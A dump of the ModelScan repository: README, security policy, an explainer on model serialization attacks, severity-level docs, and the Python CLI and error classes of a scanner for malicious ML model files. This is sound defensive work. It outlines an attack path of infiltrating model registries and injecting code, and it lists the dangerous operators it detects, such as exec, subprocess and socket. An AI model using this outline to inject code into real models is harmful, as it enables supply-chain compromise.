60 | 61 | ![Guardian Overview](/imgs/guardian_overview.png) 62 | 63 | ### Guardian's Features: 64 | 65 | 1. **Cutting-Edge Scanning**: Access our latest scanners, broader model support, and automatic model format detection. 66 | 2. **Proactive Security**: Define and enforce security requirements for Hugging Face models before they enter your environment—no code changes required. 67 | 3. **Enterprise-Wide Coverage**: Implement a cohesive security posture across your organization, seamlessly integrating with your CI/CD pipelines. 68 | 4. **Comprehensive Audit Trail**: Gain full visibility into all scans and results, empowering you to identify and mitigate threats effectively. 69 | 70 | ## Getting Started 71 | 72 | ### How ModelScan Works 73 | 74 | If loading a model with your machine learning framework automatically executes the attack, 75 | how does ModelScan check the content without loading the malicious code? 76 | 77 | Simple, it reads the content of the file one byte at a time just like a string, looking for 78 | code signatures that are unsafe. This makes it incredibly fast, scanning models in the time it 79 | takes for your computer to process the total filesize from disk(seconds in most cases). It also secure. 80 | 81 | ModelScan ranks the unsafe code as: 82 | 83 | - CRITICAL 84 | - HIGH 85 | - MEDIUM 86 | - LOW 87 | 88 | ![ModelScan Flow Chart](/imgs/model_scan_flow_chart.png) 89 | 90 | If an issue is detected, reach out to the author's of the model immediately to determine the cause. 91 | 92 | In some cases, code may be embedded in the model to make things easier to reproduce as a data scientist, but 93 | it opens you up for attack. Use your discretion to determine if that is appropriate for your workloads. 94 | 95 | ### What Models and Frameworks Are Supported? 96 | 97 | This will be expanding continually, so look out for changes in our release notes. 
98 | 99 | At present, ModelScan supports any Pickle derived format and many others: 100 | 101 | | ML Library | API | Serialization Format | modelscan support | 102 | |----------------------------------------------|------------------------------------------------------------------------------------------------------------|-------------------------------------|-------------------| 103 | | Pytorch | [torch.save() and torch.load()](https://pytorch.org/tutorials/beginner/saving_loading_models.html ) | Pickle | Yes | 104 | | Tensorflow | [tf.saved_model.save()](https://www.tensorflow.org/guide/saved_model) | Protocol Buffer | Yes | 105 | | Keras | [keras.models.save(save_format= 'h5')](https://www.tensorflow.org/guide/keras/serialization_and_saving) | HD5 (Hierarchical Data Format) | Yes | 106 | | | [keras.models.save(save_format= 'keras')](https://www.tensorflow.org/guide/keras/serialization_and_saving) | Keras V3 (Hierarchical Data Format) | Yes | 107 | | Classic ML Libraries (Sklearn, XGBoost etc.) | pickle.dump(), dill.dump(), joblib.dump(), cloudpickle.dump() | Pickle, Cloudpickle, Dill, Joblib | Yes | 108 | 109 | ### Installation 110 | 111 | ModelScan is installed on your systems as a Python package(Python 3.9 to 3.12 supported). 
As shown from above you can install 112 | it by running this in your terminal: 113 | 114 | ```bash 115 | pip install modelscan 116 | ``` 117 | 118 | To include it in your project's dependencies so it is available for everyone, add it to your `requirements.txt` 119 | or `pyproject.toml` like this: 120 | 121 | ```toml 122 | modelscan = ">=0.1.1" 123 | ``` 124 | 125 | Scanners for Tensorflow or HD5 formatted models require installation with extras: 126 | 127 | ```bash 128 | pip install 'modelscan[ tensorflow, h5py ]' 129 | ``` 130 | 131 | ### Using ModelScan via CLI 132 | 133 | ModelScan supports the following arguments via the CLI: 134 | 135 | | Usage | Argument | Explanation | 136 | |----------------------------------------------------------------------------------|------------------|---------------------------------------------------------| 137 | | ```modelscan -h``` | -h or --help | View usage help | 138 | | ```modelscan -v``` | -v or --version | View version information | 139 | | ```modelscan -p /path/to/model_file``` | -p or --path | Scan a locally stored model | 140 | | ```modelscan -p /path/to/model_file --settings-file ./modelscan-settings.toml``` | --settings-file | Scan a locally stored model using custom configurations | 141 | | ```modelscan create-settings-file``` | -l or --location | Create a configurable settings file | 142 | | ```modelscan -r``` | -r or --reporting-format | Format of the output. Options are console, json, or custom (to be defined in settings-file). Default is console | 143 | | ```modelscan -r reporting-format -o file-name``` | -o or --output-file | Optional file name for output report | 144 | | ```modelscan --show-skipped``` | --show-skipped | Print a list of files that were skipped during the scan | 145 | 146 | Remember models are just like any other form of digital media, you should scan content from any untrusted source before use. 
147 | 148 | #### CLI Exit Codes 149 | 150 | The CLI exit status codes are: 151 | 152 | - `0`: Scan completed successfully, no vulnerabilities found 153 | - `1`: Scan completed successfully, vulnerabilities found 154 | - `2`: Scan failed, modelscan threw an error while scanning 155 | - `3`: No supported files were passed to the tool 156 | - `4`: Usage error, CLI was passed invalid or incomplete options 157 | 158 | ### Understanding The Results 159 | 160 | Once a scan has been completed you'll see output like this if an issue is found: 161 | 162 | ![ModelScan Scan Output](https://github.com/protectai/modelscan/raw/main/imgs/cli_output.png) 163 | 164 | Here we have a model that has an unsafe operator for both `ReadFile` and `WriteFile` in the model. 165 | Clearly we do not want our models reading and writing files arbitrarily. We would now reach out 166 | to the creator of this model to determine what they expected this to do. In this particular case 167 | it allows an attacker to read our AWS credentials and write them to another place. 168 | 169 | That is a firm NO for usage. 170 | 171 | ## Integrating ModelScan In Your ML Pipelines and CI/CD Pipelines 172 | 173 | Ad-hoc scanning is a great first step, please drill it into yourself, peers, and friends to do 174 | this whenever they pull down a new model to explore. It is not sufficient to improve security 175 | for production MLOps processes. 176 | 177 | Model scanning needs to be performed more than once to accomplish the following: 178 | 179 | 1. Scan all pre-trained models before loading it for further work to prevent a compromised 180 | model from impacting your model building or data science environments. 181 | 2. Scan all models after training to detect a supply chain attack that compromises new models. 182 | 3. Scan all models before deploying to an endpoint to ensure that the model has not been compromised after storage. 183 | 184 | The red blocks below highlight this in a traditional ML Pipeline. 
185 | ![MLOps Pipeline with ModelScan](https://github.com/protectai/modelscan/raw/main/imgs/ml_ops_pipeline_model_scan.png) 186 | 187 | The processes would be the same for fine-tuning or any modifications of LLMs, foundational models, or external model. 188 | 189 | Embed scans into deployment processes in your CI/CD systems to secure usage 190 | as models are deployed as well if this is done outside your ML Pipelines. 191 | 192 | ## Diving Deeper 193 | 194 | Inside the 📓[**notebooks**](https://github.com/protectai/modelscan/tree/main/notebooks) folder you can explore a number of notebooks that showcase 195 | exactly how Model Serialization Attacks can be performed against various ML Frameworks like TensorFlow and PyTorch. 196 | 197 | To dig more into the meat of how exactly these attacks work check out 🖹 [**Model Serialization Attack Explainer**](https://github.com/protectai/modelscan/blob/main/docs/model_serialization_attacks.md). 198 | 199 | If you encounter any other approaches for evaluating models in a static context, please reach out, we'd love 200 | to learn more! 201 | 202 | ## Licensing 203 | 204 | Copyright 2024 Protect AI 205 | 206 | Licensed under the Apache License, Version 2.0 (the "License"); 207 | you may not use this file except in compliance with the License. 208 | You may obtain a copy of the License at 209 | 210 | 211 | 212 | Unless required by applicable law or agreed to in writing, software 213 | distributed under the License is distributed on an "AS IS" BASIS, 214 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 215 | See the License for the specific language governing permissions and 216 | limitations under the License. 217 | 218 | ## Acknowledgements 219 | 220 | We were heavily inspired by [Matthieu Maitre](http://mmaitre314.github.io) who built [PickleScan](https://github.com/mmaitre314/picklescan). 221 | We appreciate the work and have extended it significantly with ModelScan. 
ModelScan is OSS’ed in the similar spirit as PickleScan. 222 | 223 | ## Contributing 224 | 225 | We would love to have you contribute to our open source ModelScan project. 226 | If you would like to contribute, please follow the details on [Contribution page](https://github.com/protectai/modelscan/blob/main/CONTRIBUTING.md). 227 | -------------------------------------------------------------------------------- /SECURITY.md: -------------------------------------------------------------------------------- 1 | # Security Policy 2 | 3 | ## Supported Versions 4 | 5 | | Version | Supported | 6 | | ------- | ------------------ | 7 | | 0.x | :white_check_mark: | 8 | | 1.x | :white_check_mark: | 9 | 10 | ## Reporting a Vulnerability 11 | 12 | If you find a vulnerability in modelscan, perform the following steps: 13 | 14 | 1. [Open an issue](https://github.com/protectai/modelscan/issues/new?assignees=&labels=bug&template=bug_report.md&title=[BUG]%20Security%20Vulnerability) in the modelscan repo. Use `[BUG] Security Vulnerability` as the title and do not include any vulnerability details in the issue description. 15 | 2. Send us an email at `security@protectai.com` with the following: 16 | - The link to the issue you created above. 17 | - Your GitHub handle. 18 | - Details about the vulnerability including: 19 | - A description of what the vulnerability is. 20 | - Evidence of the issue happening or references to the relevant lines of code. 21 | - Instructions to reproduce the issue. 22 | 23 | After we have reproduced the issue we will reply to the issue and [open a draft security advisory](https://docs.github.com/en/code-security/security-advisories/creating-a-security-advisory) and will discuss the details there. 24 | 25 | Once we've released a fix we will use the Security Advisory to announce the findings. 
26 | -------------------------------------------------------------------------------- /docs/attack-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/docs/attack-1.png -------------------------------------------------------------------------------- /docs/attack-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/docs/attack-2.png -------------------------------------------------------------------------------- /docs/attack-3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/docs/attack-3.png -------------------------------------------------------------------------------- /docs/model_serialization_attacks.md: -------------------------------------------------------------------------------- 1 | # Model Serialization Attacks 2 | 3 | Machine Learning(ML) models are the foundational asset in ML powered applications. The ability to store and retrieve models securely is critical for success. Depending on the ML library in use there are a number of common formats in which a model can be saved. Popular choices are: Pickle, HDF5/H5 (Hierarchical Data Format), TensorFlow SavedModel, Model Checkpoints, and ONNX (Open Neural Network Exchange). Many of these formats allow for code to be stored alongside the model and create an often overlooked threat vector. 4 | 5 | Models can be compromised in various ways, some are new like adversarial machine learning methods, others are common with traditional applications like denial of service attacks. While these can be a threat to safely operating an ML powered application, this document focuses on exposing the risk of Model Serialization Attacks. 
6 | In a Model Serialization Attack malicious code is added to a model when it is saved; this is also called a code injection attack. When any user or system then loads the model for further training or inference, the attack code is executed immediately, often with no visible change in behavior to users. This makes the attack a powerful vector and an easy point of entry for attacking broader machine learning components. 7 | 8 | To secure ML models, you need to understand what’s inside them and how they are stored on disk in a process called serialization. 9 | 10 | ML models are composed of: 11 | 12 | 1. **Vectors** **— core data structure** 13 | 1. NumPy arrays — Primarily used with classic ML frameworks (Scikit-learn, XGBoost, ..) 14 | 2. Tensors (TensorFlow Tensor, PyTorch Tensor, ..)
15 | Popular DNN frameworks like TensorFlow and Pytorch have implemented their own Tensor libraries that enable performant operations during training and inference. Typically DNN model weights and biases can be stored separately from the DNN Model Architecture (Computation and Transformations). 16 | 2. **Computation and Transformations** 17 | 1. Classic ML algorithms 18 | 1. Regression 19 | 2. Classification 20 | 3. Clustering and more 21 | 2. Deep Neural Network(DNN) layers 22 | 1. CNN based 23 | 2. RNN based 24 | 3. Transformers based and more 25 | 3. Vector/Tensor transformations 26 | 27 | Before digging into how a Model Serialization Attack works and how to scan for them, first you should learn a few approaches to saving models, and the security implications of each option. 28 | 29 | # Approaches for Storing ML Models & Security Implications 30 | 31 | ## 1. Pickle Variants 32 | 33 | **Pickle** and its variants (cloudpickle, dill, joblib) all store objects to disk in a general purpose way. These frameworks are completely ML agnostic and store Python objects as-is. 34 | 35 | Pickle is the defacto library for serializing ML models for following ML frameworks: 36 | 37 | 1. Classic ML models (scikit-learn, XGBoost, ..) 38 | 2. PyTorch models (via built-in [torch.save](http://torch.save) API) 39 | 40 | Pickle is also used to store vectors/tensors only for following frameworks: 41 | 42 | 1. Numpy via `numpy.save(.., allow_pickle=True, )` 43 | 2. PyTorch via `torch.save(model.state_dict(), ..)` 44 | 45 | ### Security Implications 46 | 47 | Pickle allows for arbitrary code execution and is highly vulnerable to code injection attacks with very large attack surface. Pickle documentation makes it clear with the following warning: 48 | 49 | > **Warning:** The `pickle` module **is not secure**. Only unpickle data you trust. 50 | > 51 | > 52 | > It is possible to construct malicious pickle data which will **execute 53 | > arbitrary code during unpickling**. 
Never unpickle data that could have come 54 | > from an untrusted source, or that could have been tampered with. 55 | > 56 | > Consider signing data with [hmac](https://docs.python.org/3/library/hmac.html#module-hmac) if you need to ensure that it has not 57 | > been tampered with. 58 | > 59 | > Safer serialization formats such as [json](https://docs.python.org/3/library/json.html#module-json) may be more appropriate if 60 | > you are processing untrusted data. 61 | 62 | Source: [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html) 63 | 64 | ## 2. TensorFlow SavedModel 65 | 66 | TensorFlow is one of the few ML frameworks to implement its own storage format, SavedModel format, basing it on the Protocol Buffer format. 67 | 68 | ### Security Implications 69 | 70 | This is generally a secure approach as majority of TensorFlow operations are just ML computations and transformations. However, exceptions exist that can be exploited for model serialization attacks: 71 | 72 | - `io.write_file` 73 | - `io.read_file` 74 | - `io.MatchingFiles` 75 | - Custom Operators — allow arbitrary code to be executed but these operators need to be explicitly loaded during Inference as a library which makes it hard to carry out a model serialization attack however these can be potent in a supply chain attack. So it is still important to treat TensorFlow models with custom operators to high degree of scrutiny. 76 | 77 | ## 3. H5 (Keras) 78 | 79 | Keras is one of the few ML frameworks to natively offer model serialization to the HDF5 format. HDF5 is a general format for data serialization popular in academia and research. Keras offers two flavors of HDF5/H5py: 80 | 81 | 1. `tf.keras.Model.save` with `save_format='h5'` or passing a filename that ends in `.h5` 82 | 2. New Keras v3 format — recommended since TensorFlow version v2.13.0
83 | Passing `save_format='tf'` to `save()` or passing a filename without an extension 84 | 85 | ### Security Implications 86 | 87 | This is generally a secure format with the exception of Keras Lambda layer operation. Lambda Layer operation allows for arbitrary code execution (meant for data pre/post processing before it gets passed to ML model) and hence opens up large attack surface. 88 | 89 | ## 4. Inference Only 90 | 91 | The frameworks in this category all implement their own internal ML Computational Graph with built-in operators. These operators do not perform disk or network I/O and hence have very small attack vector (if any). They strictly focus on ML computation and transformation. 92 | 93 | ### Security Implications 94 | 95 | These operators are restricted to ML computations and transformations and hence have small attack surface. Similar to the above category though, supply chain attacks can be carried out with Custom Operators, so treat any usage of that feature with a high degree of scrutiny. 96 | 97 | 1. ONNX 98 | 2. TensorRT 99 | 3. Apache TVM 100 | 101 | ## 5. Vector/Tensor Only 102 | 103 | Typically used for sharing DNN model weights only, without DNN architecture (computations and transformations). Some of the general purpose serialization frameworks used are: 104 | 105 | 1. JSON 106 | 2. MsgPack 107 | 3. Apache Arrow 108 | 4. FlatBuffers 109 | 110 | Following are special purpose serialization formats for storing vector/tensor (including but not limited to model weights and biases): 111 | 112 | 1. Safetensors 113 | 2. NPY/NPZ (NumPy’s own binary file format) 114 | 115 | ### Security Implication 116 | 117 | With the exception of pickle, these formats cannot execute arbitrary code. However, an attacker can modify weights and biases to tweak or influence the ML model differently resulting in security risk. Meaningful manipulation of model weights and biases to perform a poisoning attack is non-trivial but possible. 
118 | 119 | ## Summary 120 | 121 | | Approach | Popularity | Risk of Model Serialization Attack Exploitability | 122 | | --- | --- | --- | 123 | | Pickle Variants | Very high | Very high | 124 | | Tensorflow SavedModel | High | Medium | 125 | | H5 (Keras) | High | Low (except Keras Lambda layer) | 126 | | Inference Only | Medium | Low | 127 | | Vector/Tensor Only | Low | Very low | 128 | 129 | With an understanding of various approaches to model serialization, explore how many popular choices are vulnerable to this attack with an end to end explanation. 130 | 131 | # End to end Attack Scenario 132 | 133 | 1. Internal attacker: 134 | The attack complexity will vary depending on the access trusted to an internal actor. 135 | 2. External attacker: 136 | External attackers usually have to start from scratch unless they have infiltrated already and are trying to perform privilege escalation attacks. 137 | 138 | ### Step 1: Find where ML models are stored 139 | 140 | In either case, the attacker will typically start with the system that stores ML models at rest. This is typically a specialized Model Registry or a generic artifact storage system. 
141 | 142 | OSS examples: 143 | 144 | - [MLflow](https://mlflow.org/) (check out Protect AI’s [blog post series](https://protectai.com/blog/tag/mlflow) uncovering critical vulnerabilities in MLflow model artifact storage system) 145 | - [Kubeflow](https://www.kubeflow.org/docs/external-add-ons/kserve/webapp/) 146 | - [Aim](https://github.com/aimhubio/aim) 147 | 148 | Commercial examples: 149 | 150 | - [Amazon Sagemaker](https://docs.aws.amazon.com/sagemaker/latest/dg/model-registry.html) 151 | - [Azure ML](https://learn.microsoft.com/en-us/azure/machine-learning/how-to-manage-models) 152 | - [Google Cloud Vertex AI](https://cloud.google.com/vertex-ai/docs/model-registry/introduction) 153 | - [Oracle Cloud Data Science](https://docs.oracle.com/en-us/iaas/data-science/using/models-about.htm) 154 | 155 | ![Find ML Models](attack-1.png) 156 | 157 | ### Step 2: Infiltrate Model Registry 158 | 159 | There are many ways to carry out infiltration. Phishing and social engineering are very widely employed techniques for gaining access. Another technique would be to look for unpatched instances of an OSS Model Registry like MLflow (see [Protect AI blog post series](https://protectai.com/blog/tag/mlflow) for more). 160 | 161 | ![Infiltrate](attack-2.png) 162 | 163 | ### Step 3: Inject Malicious Code into ML models 164 | 165 | This is the easiest step of all. See [ModelScan Notebook Examples](https://github.com/protectai/modelscan/tree/main/notebooks) for details (working Notebooks and code samples) on how this attack can be carried out. For certain serialized model formats like pickle, an attacker can inject arbitrary code that executes. This pushes the attack surface wide open to all kinds of attacks including a few included below. 166 | 167 | ![Attack](attack-3.png) 168 | 169 | With how easy it is to compromise a model, it is important to know how to securely serialize models to mitigate this threat as much as possible.
170 | 171 | # How to Securely Serialize Models 172 | 173 | Avoid use of pickle (and its variants). It is by far the most insecure format for serializing models. Below we have recommendations (more to come soon): 174 | 175 | | ML Framework | Secure Serialization | Details | Pros | Cons | 176 | | --- | --- | --- | --- | --- | 177 | | **PyTorch** | ONNX | Export model to ONNX [via torch.onnx.export method](https://pytorch.org/tutorials/advanced/super_resolution_with_onnxruntime.html).

Avoid PyTorch’s torch.save functionality as it is not secure. | ONNX is a secure format. It does not allow for arbitrary code execution.

ONNX is significantly faster than raw PyTorch for Inference. | ONNX is not just a serialization format. The model undergoes conversion from a PyTorch to an ONNX model. ONNX maps PyTorch tensors and ML graph (computation) into its own. | 178 | | **TensorFlow** | SavedModel | TensorFlow native serialization format based on Protocol Buffers. | Native format. Easy to use. Fairly secure. | A handful of TF operations allow disk I/O that can be exploited.

ModelScan will look for these and generate a finding. | 179 | | **Keras** | HDF5 or Keras v3 | TensorFlow native serialization format based on HDF5/H5. | Native format. Easy to use. Fairly secure. | Avoid lambda layer. It is not secure. Instead share pre/post-processing code between training and inference code.

ModelScan will look for lambda layer and generate a finding. | 180 | 181 | # How to Secure ML Models 182 | 183 | Defense in Depth and Zero Trust are critical strategies for modern software security. We recommend the following measures: 184 | 185 | 1. Only store ML models in a system with **authenticated access**. 186 | For instance MLflow (a very popular OSS model registry) does not offer any authentication out of the box. Unfortunately, there are many public instances of MLflow on the Internet that did not place an authentication gateway in front of MLflow. The proprietary models on these instances are publicly accessible! 187 | 2. Implement fine-grained least privilege access via **Authorization** or **IAM** (Identity and Access Management) systems. 188 | 3. Use a scanning tool like **ModelScan** — this will catch any code injection attempts. 189 | 1. Scan all models before they are used (retraining, fine tuning, evaluation, or inference) at any and all points in your ML ecosystem. 190 | 4. **Encrypt models at rest** (e.g. S3 bucket encryption) — this will reduce chances of an adversary (external or even internal) reading and writing models after a successful infiltration attempt. 191 | 5. **Encrypt models in transit** — always use TLS or mTLS for all HTTP/TCP connections including when models are loaded over the network including internal networks. This protects against MITM (man in the middle) attacks. 192 | 6. For your own models, **store checksum** and always **verify checksum** when loading models. This ensures integrity of the model file(s). 193 | 7. **Cryptographic signature** — this ensures both integrity and authenticity of the model. 
194 | -------------------------------------------------------------------------------- /docs/severity_levels.md: -------------------------------------------------------------------------------- 1 | # modelscan Severity Levels 2 | 3 | modelscan classifies potentially malicious code injection attacks in the following four severity levels. 4 |

5 | 6 | - **CRITICAL:** A model file that consists of unsafe operators/globals that can execute code is classified at critical severity. These operators are: 7 | - exec, eval, runpy, sys, open, breakpoint, os, subprocess, socket, nt, posix 8 |

9 | - **HIGH:** A model file that consists of unsafe operators/globals that cannot execute code but can still be exploited is classified at high severity. These operators are: 10 | - webbrowser, httplib, request.api, Tensorflow ReadFile, Tensorflow WriteFile 11 |

12 | - **MEDIUM:** A model file that consists of operators/globals that are neither supported by the parent ML library nor are known to modelscan is classified at medium severity. 13 | - Keras Lambda layer can also be used for arbitrary code execution. In general, it is not a best practice to add a Lambda layer to an ML model that can get exploited for code injection attacks. 14 | - Work in Progress: Custom operators will be classified at medium severity. 15 |

16 | - **LOW:** At the moment no operators/globals are classified at low severity level. 17 | -------------------------------------------------------------------------------- /imgs/PAI-ModelScan-banner-080323-space.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/PAI-ModelScan-banner-080323-space.png -------------------------------------------------------------------------------- /imgs/PAI-ModelScan-banner-080323-white.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/PAI-ModelScan-banner-080323-white.png -------------------------------------------------------------------------------- /imgs/PAI-social-product-ModelScan-1200x675.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/PAI-social-product-ModelScan-1200x675.png -------------------------------------------------------------------------------- /imgs/attack_example.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/attack_example.png -------------------------------------------------------------------------------- /imgs/cli_output.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/cli_output.png -------------------------------------------------------------------------------- /imgs/flow_chart.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/flow_chart.png -------------------------------------------------------------------------------- /imgs/guardian_overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/guardian_overview.png -------------------------------------------------------------------------------- /imgs/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/logo.png -------------------------------------------------------------------------------- /imgs/ml_ops_pipeline_model_scan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/ml_ops_pipeline_model_scan.png -------------------------------------------------------------------------------- /imgs/model_scan_flow_chart.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/model_scan_flow_chart.png -------------------------------------------------------------------------------- /imgs/model_scan_tutorial.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/model_scan_tutorial.gif -------------------------------------------------------------------------------- /imgs/modelscan-unsafe-model.gif: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/protectai/modelscan/62bec23d0482bb0b32790c0660ae2b30fae93bf7/imgs/modelscan-unsafe-model.gif -------------------------------------------------------------------------------- /modelscan/__init__.py: -------------------------------------------------------------------------------- 1 | """CLI for scanning models""" 2 | 3 | import logging 4 | 5 | from modelscan._version import __version__ 6 | 7 | logging.getLogger("modelscan").addHandler(logging.NullHandler()) 8 | -------------------------------------------------------------------------------- /modelscan/_version.py: -------------------------------------------------------------------------------- 1 | __version__ = "0.0.0" 2 | -------------------------------------------------------------------------------- /modelscan/cli.py: -------------------------------------------------------------------------------- 1 | import logging 2 | import sys 3 | import os 4 | from pathlib import Path 5 | from typing import Optional 6 | from tomlkit import parse 7 | 8 | import click 9 | 10 | from modelscan.modelscan import ModelScan 11 | from modelscan._version import __version__ 12 | from modelscan.settings import ( 13 | SettingsUtils, 14 | DEFAULT_SETTINGS, 15 | DEFAULT_REPORTING_MODULES, 16 | ) 17 | from modelscan.tools.cli_utils import DefaultGroup 18 | 19 | logger = logging.getLogger("modelscan") 20 | 21 | 22 | CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"]) 23 | 24 | 25 | @click.group( 26 | "cli", 27 | cls=DefaultGroup, 28 | default="scan", 29 | context_settings=CONTEXT_SETTINGS, 30 | help=""" 31 | Modelscan detects machine learning model files that perform suspicious actions. 32 | 33 | To scan a model file or directory, simply point toward your desired path: 34 | `modelscan -p /path/to/model_file.h5` 35 | 36 | Scanning is the default action. 
@click.version_option(__version__, "-v", "--version")
@click.option(
    "-p",
    "--path",
    type=click.Path(exists=True),
    default=None,
    help="Path to the file or folder to scan",
)
@click.option(
    "-l",
    "--log",
    type=click.Choice(["CRITICAL", "ERROR", "WARNING", "INFO", "DEBUG"]),
    default="INFO",
    help="level of log messages to display (default: INFO)",
)
@click.option(
    "--show-skipped",
    is_flag=True,
    default=False,
    help="Print a list of files that were skipped during the scan",
)
@click.option(
    "--settings-file",
    type=click.Path(exists=True, dir_okay=False),
    help="Specify a settings file to use for the scan. Defaults to ./modelscan-settings.toml.",
)
@click.option(
    "-r",
    "--reporting-format",
    type=click.Choice(["console", "json", "custom"]),
    default="console",
    help="Format of the output. Options are console, json, or custom (to be defined in settings-file). Default is console.",
)
@click.option(
    "-o",
    "--output-file",
    type=click.Path(),
    default=None,
    help="Optional file name for output report",
)
@cli.command(
    help="[Default] Scan a model file or directory for ability to execute suspicious actions. "
)  # type: ignore
@click.pass_context
def scan(
    ctx: click.Context,
    log: str,
    path: Optional[str],
    show_skipped: bool,
    settings_file: Optional[str],
    reporting_format: str,
    # Annotation fix: click passes None when -o/--output-file is omitted,
    # so this is Optional, not a bare Path (click actually supplies a str).
    output_file: Optional[Path],
) -> int:
    """Scan a model file or directory and report suspicious operators.

    Returns an exit code rather than raising: 0 = clean scan, 1 = issues
    found, 2 = scan errors, 3 = no supported files were scanned.
    """
    # NOTE(review): a StreamHandler is added on every invocation; repeated
    # in-process calls would duplicate log output — confirm single-shot use.
    logger.setLevel(logging.INFO)
    logger.addHandler(logging.StreamHandler(stream=sys.stdout))

    # `log` has a click default of "INFO", so this branch normally runs and
    # overrides the level set above.
    if log is not None:
        logger.setLevel(getattr(logging, log))

    # Fall back to ./modelscan-settings.toml when no --settings-file given.
    settings_file_path = Path(
        settings_file if settings_file else f"{os.getcwd()}/modelscan-settings.toml"
    )

    settings = DEFAULT_SETTINGS

    if settings_file_path and settings_file_path.is_file():
        with open(settings_file_path, encoding="utf-8") as sf:
            settings = parse(sf.read()).unwrap()
        click.echo(f"Detected settings file. Using {settings_file_path}. \n")
    else:
        click.echo(
            f"No settings file detected at {settings_file_path}. Using defaults. \n"
        )

    modelscan = ModelScan(settings=settings)

    if path is not None:
        # click's Path(exists=True) already validated existence; this is a
        # defensive re-check ("." is resolved to the current directory).
        pathlibPath = Path().cwd() if path == "." else Path(path).absolute()
        if not pathlibPath.exists():
            raise FileNotFoundError(f"Path {path} does not exist")
        else:
            modelscan.scan(path)
    else:
        raise click.UsageError("Command line must include a path")

    # Report scan results: "custom" keeps whatever module the settings file
    # configured; console/json select the built-in reporting modules.
    if reporting_format != "custom":
        modelscan._settings["reporting"]["module"] = DEFAULT_REPORTING_MODULES[
            reporting_format
        ]

    modelscan._settings["reporting"]["settings"]["show_skipped"] = show_skipped
    modelscan._settings["reporting"]["settings"]["output_file"] = output_file

    modelscan.generate_report()

    # exit code 3 if no supported files were passed
    if not modelscan.scanned:
        return 3
    # exit code 2 if scan encountered errors
    elif modelscan.errors:
        return 2
    # exit code 1 if scan completed successfully and vulnerabilities were found
    elif modelscan.issues.all_issues:
        return 1
    # exit code 0 if scan completed successfully and no vulnerabilities were found
    else:
        return 0
@cli.command("create-settings-file", help="Create a modelscan settings file")  # type: ignore
@click.option(
    "-f", "--force", is_flag=True, help="Overwrite existing settings file if it exists."
)
@click.option(
    "-l",
    "--location",
    type=click.Path(dir_okay=False, writable=True),
    help="The specific filepath to write the settings file.",
)
def create_settings(force: bool, location: Optional[str]) -> None:
    """Write the default modelscan settings to a TOML file.

    Writes to --location if given, otherwise ./modelscan-settings.toml.
    Refuses to overwrite an existing file unless --force is passed.
    """
    settings_path = location or os.path.join(os.getcwd(), "modelscan-settings.toml")

    # Fix: the original probed for existence with a bare open() whose handle
    # was never closed (file-descriptor leak). An existence check both avoids
    # the leak and reads more clearly; write behavior is unchanged.
    if os.path.exists(settings_path) and not force:
        logger.warning(
            "%s file already exists. Please use `--force` flag if you intend to overwrite it.",
            settings_path,
        )
        return

    with open(settings_path, mode="w", encoding="utf-8") as settings_file:
        settings_file.write(SettingsUtils.get_default_settings_as_toml())


def main() -> None:
    """CLI entry point: run click with standalone_mode off and map outcomes
    to process exit codes (0/1/2/3 from scan, 4 for CLI usage errors)."""
    result = 0
    try:
        result = cli.main(standalone_mode=False)

    except click.ClickException as e:
        click.echo(f"Error: {e}")
        with click.Context(cli) as ctx:
            click.echo(cli.get_help(ctx))
        # exit code 4 for CLI usage errors
        result = 4

    except Exception as e:
        click.echo(f"Exception: {e}")
        # exit code 2 if scan throws exceptions
        result = 2

    finally:
        sys.exit(result)


if __name__ == "__main__":
    main()
class ModelScanError(ErrorBase):
    """Generic top-level scan error not tied to a scanner or path."""

    def __str__(self) -> str:
        return f"The following error was raised: \n{self.message}"

    @staticmethod
    def name() -> str:
        return "MODEL_SCAN"


class ModelScanScannerError(ModelScanError):
    """Error raised while a specific scanner processed a specific model."""

    scan_name: str
    model: Model

    def __init__(
        self,
        scan_name: str,
        message: str,
        model: Model,
    ) -> None:
        super().__init__(message)
        self.scan_name = scan_name
        self.model = model

    def __str__(self) -> str:
        return f"The following error was raised during a {self.scan_name} scan: \n{self.message}"

    def to_dict(self) -> Dict[str, str]:
        # Extends the base payload with the model's source path.
        return {
            "category": self.name(),
            "description": self.message,
            "source": str(self.model.get_source()),
        }


class DependencyError(ModelScanScannerError):
    """A scanner's optional binary dependency (e.g. h5py) is missing."""

    @staticmethod
    def name() -> str:
        return "DEPENDENCY"


class PathError(ErrorBase):
